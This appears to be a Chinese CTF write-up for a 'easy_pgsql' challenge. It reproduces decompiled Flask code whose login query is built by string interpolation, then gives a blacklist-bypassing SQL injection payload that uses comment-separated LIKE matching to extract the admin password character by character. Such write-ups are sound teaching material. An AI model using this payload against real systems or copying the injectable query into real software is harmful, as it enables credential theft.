广东省强网杯企业组easy_pgsql writeup

  • A+
所属分类:CTF专场

只解了一题,没空看了,记录一下解法

首先拿到题目是easy_pgsql,通过扫描拿到了www.zip 里面是两个pyc文件,还原后阅读源码

# uncompyle6 version 3.7.4# Python bytecode 3.6 (3379)# Decompiled from: Python 3.6.9 (default, Jan 26 2021, 15:33:00) # [GCC 8.4.0]# Embedded file name: server.py# Compiled at: 2021-09-21 23:35:13# Size of source mod 2**32: 2400 bytesfrom flask import Flask, requestimport flag, psycopg2app = Flask(__name__)
def query(select_query): conn = psycopg2.connect(database='****', user='****', password='****', host='****') cur = conn.cursor() cur.execute(select_query) info = cur.fetchone() return info

@app.route('/flag', methods=['POST'])def get_secrets(): if 'username' not in request.form: return ('Please input username', 400) else: if 'password' not in request.form: return ('Please input password', 400) else: username, password = request.form['username'], request.form['password'] blacklist = ['****'] if username != 'admin': return ('WowQ! This is FAKE flag{FAKE_FLAG_FOR_YOU}', 200) for ban in blacklist: if ban in password.lower(): return ('Bad Hacker!', 403)
select_query = f"SELECT password FROM users WHERE username='admin' AND password='{password}'" wrongflag = 0 if (f"{password}")[0] == "'": select_query = select_query[0:-1] wrongflag = 1 info = query(select_query) if info is None: return ('Wrong Password!', 403) if wrongflag == 1: res = info[0][0:-1] else: res = info[0] if res == (f"{password}"): return ( f"Welcome admin, have a flag: {flag.flag}", 200) return ('Something Wrong!', 403)

@app.route('/', methods=['GET'])def index(): return 'n<html>n<head><title>Login...</title></head>n</html>n<style>n body{n background-color: rgba(0,152,70,0.7);n }n .auto {n width: 200px;n height: 200px;n background-color: rgba(255,255,255,0.5);n position: absolute;n margin: auto;n top: 0;n left: 0;n bottom: 0;n right: 0;n }n</style>n<body>n<div class="auto">n<p>Welcome! If you are admin, I will give U flag!<p>nn<form action="/flag" method="post">n<div>username: <input type="text" name="username"/></div>n<div>password: <input type="password" name="password"/></div>n<div style="margin:auto;width:200px">nn<input type="submit" name="submit"/>n</div>n</form>n</div>n</body>n</html>n'

if __name__ == '__main__': app.run(host='0.0.0.0', debug=False)# okay decompiling server.cpython-36.pyc

首先blacklist不知道 在检测到password第一位是'之后 截取在拼接,就是如下这个效果


select xxx from xxx where password =''xxxx

在48行如果密码等于数据库查询出来的信息,就打印出flag


fuzz后发现黑名单过滤如下

#substrsubstring空格

等等

但是可以注意到语句

SELECT password FROM users WHERE username='admin' AND password='{password}'

这里直接通过like匹配admin源码就完事

payload

username=admin&password='or/**/password/**/like'ch%'&submit=Submit+Query


广东省强网杯企业组easy_pgsql writeup

一位一位跑,这密码真的是又臭又长

广东省强网杯企业组easy_pgsql writeup

最终跑出flag


原文始发于微信公众号(8ypass):广东省强网杯企业组easy_pgsql writeup

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: